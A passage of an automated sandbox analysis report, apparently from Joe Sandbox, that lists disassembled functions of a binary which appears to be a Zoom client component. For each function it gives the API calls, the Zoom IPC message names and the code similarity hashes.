                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D19
                  • Part of subcall function 00C87CBE: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D56
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D86
                  • Part of subcall function 00C87CBE: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive), ref: 00C87DE4
                  • Part of subcall function 00C87CBE: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information), ref: 00C87E01
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@TreeV12@@
                • String ID: com.Zoom.app.conf.pmc.meeting.ended$groupId$myAccountId
                • API String ID: 9112088-2720630376
                • Opcode ID: eaf872006cb7fb31f7dc7147c9c3007eca2fe84d64af6d877e4e103343329b81
                • Instruction ID: 714fd8482c3c50959e6b75f76a5555c64fd3071d63e13feaca7994887aa04a94
                • Opcode Fuzzy Hash: eaf872006cb7fb31f7dc7147c9c3007eca2fe84d64af6d877e4e103343329b81
                • Instruction Fuzzy Hash: 0CE092F1A48A98ABD7206B889C56F2E7574AB94B69F500D38B1149A3D2CBF44D00C7B5
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76407
                • ??0?$CmmMessageTemplate_2@HV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.conf.pmc.teamchat.updated,000027AB,action,groupId,00000004), ref: 00C76427
                  • Part of subcall function 00C87690: __EH_prolog3.LIBCMT ref: 00C87697
                  • Part of subcall function 00C87690: ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C875D2,?,?,?,?,00000004,00C874D5,?,?,?,?,?), ref: 00C876AA
                  • Part of subcall function 00C93584: __EH_prolog3_GS.LIBCMT ref: 00C9358B
                  • Part of subcall function 00C93584: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935B1
                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935DF
                  • Part of subcall function 00C93584: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9361C
                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9364C
                  • Part of subcall function 00C93584: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify), ref: 00C936AA
                  • Part of subcall function 00C93584: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor), ref: 00C936C7
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: action$com.Zoom.app.conf.pmc.teamchat.updated$groupId
                • API String ID: 2715420528-1050785931
                • Opcode ID: 7e326532767c353ad6d3d73d2c11ddf58607cc6750357366b76d25002951246b
                • Instruction ID: 037bdcb874b27be8d11660fc498e47bc15f9045c6f5151de5b12e521d46bd652
                • Opcode Fuzzy Hash: 7e326532767c353ad6d3d73d2c11ddf58607cc6750357366b76d25002951246b
                • Instruction Fuzzy Hash: 9BE092B1684B95AFD710AB459C9AB2E6164EB54B5AF40457CB1005A392CBF04D00CF71
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E437
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant.control.system.devices.prepared.notify,00009D16,Json,StatusCode,00000004), ref: 00C6E457
                  • Part of subcall function 00C8B360: __EH_prolog3.LIBCMT ref: 00C8B367
                  • Part of subcall function 00C8B360: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C6BA5C,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B37A
                  • Part of subcall function 00C8B40D: __EH_prolog3_GS.LIBCMT ref: 00C8B414
                  • Part of subcall function 00C8B40D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B43A
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B468
                  • Part of subcall function 00C8B40D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4A5
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4D5
                  • Part of subcall function 00C8B40D: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm), ref: 00C8B533
                  • Part of subcall function 00C8B40D: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel), ref: 00C8B550
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: Json$StatusCode$com.zoom.app.assistant.control.system.devices.prepared.notify
                • API String ID: 2703795933-3529884890
                • Opcode ID: 32345d0ec9d4fc7ee911a3981ab6912f478cea898d717006c0d34bd6b0300113
                • Instruction ID: d443dbc92bcf461cd7df952476c9427e3c4863b7f9f25b8fe05f27da34bc988f
                • Opcode Fuzzy Hash: 32345d0ec9d4fc7ee911a3981ab6912f478cea898d717006c0d34bd6b0300113
                • Instruction Fuzzy Hash: E6E022B5B40389BBE720BB55488AB2B2164EB42B59F20403DF1508E3E2CFF08C40CB38
                APIs
                • __EH_prolog3.LIBCMT ref: 00C765E7
                • ??0?$CmmMessageTemplate_2@HV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.ps.update_account_info,00013883,type,b64_user_profile,00000004), ref: 00C76607
                  • Part of subcall function 00C8AEE0: __EH_prolog3.LIBCMT ref: 00C8AEE7
                  • Part of subcall function 00C8AEE0: ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C8AE42,?,?,?,?,00000004,00C6B83F,com.Zoom.app.notify.videolayout.download.status,00002775,status,message,data), ref: 00C8AEFA
                  • Part of subcall function 00C93584: __EH_prolog3_GS.LIBCMT ref: 00C9358B
                  • Part of subcall function 00C93584: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935B1
                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935DF
                  • Part of subcall function 00C93584: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9361C
                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9364C
                  • Part of subcall function 00C93584: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify), ref: 00C936AA
                  • Part of subcall function 00C93584: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor), ref: 00C936C7
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: b64_user_profile$com.zoom.ps.update_account_info$type
                • API String ID: 2715420528-924855614
                • Opcode ID: 21df0ef213f66a03504b0983c2df9c37b36b97a4822c1702fef3db6097027f54
                • Instruction ID: 8802e03c6622e87f801a0708d2cb73bdb73d79b2fe86c27071a8b64e3ac07d60
                • Opcode Fuzzy Hash: 21df0ef213f66a03504b0983c2df9c37b36b97a4822c1702fef3db6097027f54
                • Instruction Fuzzy Hash: A1E092F0A40784EBEB10AB45D847B6A66A4AB80B5AF50407CB1045B3D1CBF50E44D7B5
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C597
                • ??0?$CmmMessageTemplate_2@IV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.pt.notify.networkswitch,0000274B,NetworkState,AdapterName,00000004), ref: 00C6C5B7
                  • Part of subcall function 00C85B10: __EH_prolog3.LIBCMT ref: 00C85B17
                  • Part of subcall function 00C85B10: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85A32,?,?,?,?,00000004,00C6833F,com.Zoom.app.conf.start,00002718,ProcessID,ProcessName,RecoveryCommand), ref: 00C85B2A
                  • Part of subcall function 00C5D6ED: __EH_prolog3_GS.LIBCMT ref: 00C5D6F4
                  • Part of subcall function 00C5D6ED: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D71A
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D748
                  • Part of subcall function 00C5D6ED: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D785
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D7B5
                  • Part of subcall function 00C5D6ED: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify), ref: 00C5D813
                  • Part of subcall function 00C5D6ED: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID), ref: 00C5D830
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: AdapterName$NetworkState$com.Zoom.app.pt.notify.networkswitch
                • API String ID: 2715420528-1947258441
                • Opcode ID: 97fe7c9321500db3bbc018861bc817895cc24bc7590bd6269bff6c61b40ef7df
                • Instruction ID: 2126a5d2a02b77e7a611f0d6efea68af4055762ab42eca471113e9f5a8f5fcbc
                • Opcode Fuzzy Hash: 97fe7c9321500db3bbc018861bc817895cc24bc7590bd6269bff6c61b40ef7df
                • Instruction Fuzzy Hash: A9E09270A403566BE7106B455C85F2F7264EF90B19F514429B1505E3D1CBF44D44D7BA
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E5B7
                • ??0?$CmmMessageTemplate_2@II@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant.device.special.info.update.notification,00009CDF,DeviceType,SpecialInfo,00000004), ref: 00C6E5D7
                  • Part of subcall function 00C85120: __EH_prolog3.LIBCMT ref: 00C85127
                  • Part of subcall function 00C85120: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C67BBC,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C8513A
                  • Part of subcall function 00C851CD: __EH_prolog3_GS.LIBCMT ref: 00C851D4
                  • Part of subcall function 00C851CD: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C851FA
                  • Part of subcall function 00C851CD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85228
                  • Part of subcall function 00C851CD: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85265
                  • Part of subcall function 00C851CD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85295
                  • Part of subcall function 00C851CD: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState), ref: 00C852F3
                  • Part of subcall function 00C851CD: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag), ref: 00C85310
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$CriticalH_prolog3MessagePackageSectionStringTree@$EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: DeviceType$SpecialInfo$com.zoom.app.assistant.device.special.info.update.notification
                • API String ID: 3124793654-1387586116
                • Opcode ID: dd37869de5a3ef07450072a9e2e3453cb200ca1839e43e8504072568ede025b8
                • Instruction ID: 867d5cdac96dfd160211a5f1ee26ce040f5dd51aa0d02b1343053f5c6b06e2e3
                • Opcode Fuzzy Hash: dd37869de5a3ef07450072a9e2e3453cb200ca1839e43e8504072568ede025b8
                • Instruction Fuzzy Hash: A8E0D8B0A40788BBDB217B48DC4AB2E66A4FB90B59F44446CB1006B3C1CBF44C04E7B9
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70537
                • ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@H@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.virtual.speaker.create.request,00009CF8,deviceName,deviceGUID,00000004), ref: 00C70557
                  • Part of subcall function 00C8CDD0: __EH_prolog3.LIBCMT ref: 00C8CDD7
                  • Part of subcall function 00C8CDD0: ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C8CD32,?,?,?,?,00000004,00C8CC15,?,?,?,?,?), ref: 00C8CDEA
                  • Part of subcall function 00C8B40D: __EH_prolog3_GS.LIBCMT ref: 00C8B414
                  • Part of subcall function 00C8B40D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B43A
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B468
                  • Part of subcall function 00C8B40D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4A5
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4D5
                  • Part of subcall function 00C8B40D: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm), ref: 00C8B533
                  • Part of subcall function 00C8B40D: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel), ref: 00C8B550
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.zoom.app.assistant.sip.virtual.speaker.create.request$deviceGUID$deviceName
                • API String ID: 2703795933-2223400988
                • Opcode ID: e8d43718c2c8fad2fc05b135c10f991f878c94cb0f24b34942326bf4bd5010d1
                • Instruction ID: 25033cf44797e5435a24a8cfa27c1711d39c66e07b689f561850bdbffdd75070
                • Opcode Fuzzy Hash: e8d43718c2c8fad2fc05b135c10f991f878c94cb0f24b34942326bf4bd5010d1
                • Instruction Fuzzy Hash: A2E092B1A80345ABD310BB409856B6E36A8EB94B1AF10802DF5105B7D2CBF54D84DB79
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74537
                • ??0?$CmmMessageTemplate_2@HV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant.voice.command.action.request,00009D34,command,param,00000004), ref: 00C74557
                  • Part of subcall function 00C8AEE0: __EH_prolog3.LIBCMT ref: 00C8AEE7
                  • Part of subcall function 00C8AEE0: ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C8AE42,?,?,?,?,00000004,00C6B83F,com.Zoom.app.notify.videolayout.download.status,00002775,status,message,data), ref: 00C8AEFA
                  • Part of subcall function 00C93584: __EH_prolog3_GS.LIBCMT ref: 00C9358B
                  • Part of subcall function 00C93584: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935B1
                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935DF
                  • Part of subcall function 00C93584: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9361C
                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9364C
                  • Part of subcall function 00C93584: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify), ref: 00C936AA
                  • Part of subcall function 00C93584: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor), ref: 00C936C7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.zoom.app.assistant.voice.command.action.request$command$param
                • API String ID: 2715420528-3993837324
                • Opcode ID: 27353726fbbce1ec0f922d845e3a382c54897dc44973ee9073586f180724d7ae
                • Instruction ID: 0d2793ebbf45825f497b75cebe09600685c04c768676d59b2a047cb2ddf4ebb1
                • Opcode Fuzzy Hash: 27353726fbbce1ec0f922d845e3a382c54897dc44973ee9073586f180724d7ae
                • Instruction Fuzzy Hash: BBE092F8644794ABD720AB418C06B6F72A8EB40B19F04456DF1045F3D2CBF40D44C77A
                APIs
                • __EH_prolog3.LIBCMT ref: 00C746C7
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.conf.tracking.paap.event,00002792,composedEventInfo,type,00000004), ref: 00C746E7
                  • Part of subcall function 00C8B360: __EH_prolog3.LIBCMT ref: 00C8B367
                  • Part of subcall function 00C8B360: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C6BA5C,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B37A
                  • Part of subcall function 00C8B40D: __EH_prolog3_GS.LIBCMT ref: 00C8B414
                  • Part of subcall function 00C8B40D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B43A
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B468
                  • Part of subcall function 00C8B40D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4A5
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4D5
                  • Part of subcall function 00C8B40D: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm), ref: 00C8B533
                  • Part of subcall function 00C8B40D: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel), ref: 00C8B550
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
